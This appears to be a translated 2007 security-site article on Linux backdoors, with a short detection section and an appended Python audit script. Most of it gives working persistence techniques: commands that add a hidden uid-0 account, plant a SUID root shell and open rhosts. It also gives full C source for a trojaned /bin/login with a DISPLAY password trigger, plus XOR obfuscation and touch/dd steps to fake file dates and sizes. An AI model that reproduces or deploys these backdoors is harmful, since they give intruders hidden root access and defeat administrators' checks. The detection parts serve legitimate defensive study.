Analysis of Linux Backdoor Techniques and Practices - Vulnerability Early Warning - Black Bar Security Net

ID MYHACK58:62200717899
Type myhack58
Reporter Anonymous
Modified 2007-12-24T00:00:00




Introduction to backdoors

A backdoor is a technique an intruder uses, after gaining complete control of a system, to make it easy to get back in and use the system next time. It is generally achieved by modifying system configuration files and installing third-party backdoor tools. Its characteristics are that it is hidden, can bypass system logging, and is not easy for the system administrator to find.

Common backdoor techniques

- Adding a superuser account
- Cracking or sniffing user passwords
- Planting a SUID shell
- rhosts + +
- Abusing system service programs
- TCP/UDP/ICMP shells
- Crontab scheduled tasks
- Shared library files
- Rootkit toolkits
- Loadable kernel modules (LKM)

Adding a superuser

echo "e4gle:x:0:0::/:/bin/sh" >> /etc/passwd

echo "e4gle::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

If the system does not allow uid=0 users to log in over telnet, a normal user account also has to be added.

Cracking or sniffing user passwords

Obtain the shadow file and crack weak user passwords with the John the Ripper tool. Install sniffit or another sniffing tool to monitor the telnet, ftp and similar ports and collect users' passwords.

Planting a SUID shell

cp /bin/bash /dev/.rootshell

chmod u+s /dev/.rootshell

Any ordinary user on the machine who runs /dev/.rootshell gets a shell with root privileges.

rhosts + +

echo "+ +" > /.rhosts

rsh -l root csh -i

This yields a root shell from a remote host.

Abusing system service programs

Modify /etc/inetd.conf, for example: daytime stream tcp nowait /bin/sh sh -i. Replace in.telnetd, in.rexecd and other inetd service programs with backdoored versions. Redirect the login program.

BindShell: mostly a TCP/UDP-based network service program that listens on a high port; it is easy to discover. Ping backdoor: a backdoor activated by ICMP packets, forming a shell channel. TCP ACK packet backdoor: can pass through firewalls.

Crontab scheduled tasks

A backdoor installed through the crontab scheduler runs at a set time, usually late at night, when the system administrator is not online.

Shared library files

A backdoor function is embedded in a shared library; the backdoor password activates a shell and grants privileges. Because the binaries themselves are untouched, this evades the administrator's checks of the binary files.

Rootkit toolkits

A rootkit contains a series of system and backdoor tools:
- clears log entries from the logs
- forges checksums
- replaces netstat, ps and other network and system tools
- a backdoored login program
It is easy to install and use.

Loadable kernel modules (LKM)

LKM: Loadable Kernel Modules are loaded dynamically without recompiling the kernel. By intercepting system calls they can hide directories, files, processes, network connections and more. Their concealment is good and they are hard to discover. Well-known LKM packages include adore and knark.

Backdoor detection

Drawing on your own experience, combined with specific tools, do some manual testing. Use Tripwire or md5 checksums to check the system. Use an IDS to monitor the target machine for suspicious network connections.

Example: login backdoor

The intruder backs up the original /bin/login and replaces it with a small program. When the intruder logs in over telnet and passes the correct backdoor password through an environment variable or the terminal type, a shell is obtained directly; a normal user login is handed over to the original login file and processed normally, with normal logging. The simplest login backdoor, ulogin.c, has the following source:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define PASSWORD "passWORD"
#define _PATH_LOGIN "/sbin/logins"   /* where the real login was moved to */

int main(int argc, char **argv, char **envp)
{
    char *display = getenv("DISPLAY");

    if (display == NULL) {
        /* no DISPLAY set: hand over to the real login program */
        execve(_PATH_LOGIN, argv, envp);
        perror(_PATH_LOGIN);
        exit(1);
    }
    if (!strcmp(display, PASSWORD)) {
        /* backdoor password supplied through DISPLAY: give a shell */
        system("/bin/csh");
        exit(1);
    }
    execve(_PATH_LOGIN, argv, envp);
    exit(1);
}



Using the backdoor login

First, with the telnet service open, on your own machine:

bash$ export DISPLAY=passWORD
bash$ telnet xxx.xxx.xxx.xxx
Trying xxx.xxx.xxx.xxx...
Connected to (xxx.xxx.xxx.xxx).
Escape character is '^]'.
% _

The strings command

The strings command prints the displayable strings in a binary file. Used on the ulogin program above:

bash$ strings ulogin
/lib/ld-linux.so.2
..............
DISPLAY
/sbin/logins
passWORD
/bin/csh

The encrypted backdoor password (1)

1. Use the DES algorithm, i.e. the crypt() function, and write the program gen.c:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>   /* on glibc, link with -lcrypt */

int main(int argc, char *argv[])
{
    if (argc != 3) {
        printf("usage: %s <password> <salt>\n", argv[0]);
        exit(1);
    }
    /* print the password in the same hashed form as /etc/shadow */
    printf("%s\n", crypt(argv[1], argv[2]));
    return 0;
}

2. Compile it to gen and run ./gen hack ui to obtain the shadow-style result UiVqMWvDrIQjA.

3. Modify the backdoor source ulogin.c:
- Use the ciphertext form of the password as the value of the PASSWORD macro.
- If the backdoor password is correct, give the shell directly:

if (!strcmp(PASSWORD, crypt(display, PASSWORD))) {
    system(SHELL);
    exit(1);
}

With this change, the strings command shows only the encrypted password.

The encrypted backdoor password (2)

Apply an exclusive-or (XOR) algorithm and store the result as a hexadecimal-escaped string, so that the strings become non-printable.

1. The encoding program encode.c is as follows:

#include <stdio.h>
#include <string.h>

char magic[] = "\x71\x67\x6d\x7a\x65\x61\x7a";

/* XOR str in place with the repeating key */
char *de(char *str, char *key)
{
    int i = 0, j = 0, len;
    len = strlen(key);
    while (str[i] != '\0') {
        str[i] ^= key[j];
        j++;
        if (j == len)
            j = 0;
        i++;
    }
    return str;
}

/* print each byte as a \x escape, for pasting into the source */
void display(char *str)
{
    int i;
    for (i = 0; i < strlen(str); i++)
        printf("\\x%x", (unsigned char)str[i]);
    printf("\n");
}

int main(void)
{
    char buf[100], *ptr;
    ptr = buf;
    scanf("%s", ptr);
    de(ptr, magic);
    display(ptr);
    return 0;
}

2. Compile encode and run it; the string typed in is XORed with the magic string. For example, for the real login's file name /sbin/xlogin, the XOR result is: \x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb

3. In the source, define: char login[] = "\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb"; then insert the XOR function char *de() together with the same magic string to recover it at run time. The backdoor password is handled the same way. The strings command can then no longer reveal the password, the path or the other strings.

Final modifications (1)

To make the strings output of the ulogin backdoor resemble that of a normal login, the method is: add a string array char strings[] = ""; to the ulogin.c code and fill the quotes with the strings output of the normal login program. This makes it look authentic and adds confusion.

Final modifications (2)

Adjust the backdoor file's date, size and other attributes.

1. Date

ls -l /sbin/xlogin
-r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin

touch -t 199802110000 ulogin

2. Size

ls -l ulogin /sbin/xlogin
-r-sr-xr-x root root 7542 Feb 11 1998 ulogin
-r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin

19300 - 7542 = 11758

dd if=/sbin/xlogin of=/tmp/t bs=11758 count=1
1+0 records in
1+0 records out
11758 bytes transferred in 0.000379 secs (31016746 bytes/sec)

cat /tmp/t >> ulogin

Login backdoor detection

Run md5sum on the existing /bin/login file and compare it with a previously recorded value. On Red Hat Linux, use RPM verification:

rpm -V util-linux

While the intruder is using the login backdoor, they are an invisible user: inspect the system processes and look for a login -h xxx.xxx.xxx.xxx entry.
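The checks this article recommends, gathered into a small audit script (an added example, not code from the original article): the uid-0 account audit, the "+ +" rhosts check, a strings(1)-style scan of a login binary for the strings shown above, and the md5 baseline comparison. All sample inputs are constructed; note that the article's own XOR variant defeats the strings scan, so the hash baseline is the dependable check.

```python
import hashlib
import re

# Constructed sample data (not from a real system): the article's fake uid-0
# account, the "+ +" rhosts entry, and the strings(1) output shown for ulogin.
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "bin:x:1:1:bin:/bin:/sbin/nologin\n"
                 "e4gle:x:0:0::/:/bin/sh\n")
SAMPLE_RHOSTS = "+ +\n"
SAMPLE_ULOGIN = (b"\x7fELF\x01\x01\x01" + b"\x00" * 9 +
                 b"/lib/ld-linux.so.2\x00DISPLAY\x00/sbin/logins\x00"
                 b"passWORD\x00/bin/csh\x00")

def extra_uid0_accounts(passwd_text):
    """Names of uid-0 accounts other than root (the 'echo >> /etc/passwd' trick)."""
    names = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) >= 3 and f[2] == "0" and f[0] != "root":
            names.append(f[0])
    return names

def rhosts_is_promiscuous(rhosts_text):
    """True if a '+ +' line lets any user on any host rsh in without a password."""
    return any(line.split() == ["+", "+"] for line in rhosts_text.splitlines())

def printable_strings(data, min_len=4):
    """Rough strings(1): runs of printable ASCII at least min_len bytes long."""
    return [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def login_strings_worth_a_look(data):
    """Strings the article shows in ulogin that a stock login has no need for:
    a path to a *second* login binary, the DISPLAY trigger, a shell to spawn."""
    hits = []
    for s in printable_strings(data):
        other_login = re.fullmatch(r"/(?:usr/)?s?bin/\w*login\w*", s) and s != "/bin/login"
        if other_login or s in ("DISPLAY", "/bin/csh"):
            hits.append(s)
    return hits

def md5_matches_baseline(data, baseline_hex):
    """The article's md5sum check: compare with a hash recorded before compromise."""
    return hashlib.md5(data).hexdigest() == baseline_hex

if __name__ == "__main__":
    print("extra uid-0 accounts:", extra_uid0_accounts(SAMPLE_PASSWD))
    print("rhosts wide open:", rhosts_is_promiscuous(SAMPLE_RHOSTS))
    print("login strings worth a look:", login_strings_worth_a_look(SAMPLE_ULOGIN))
```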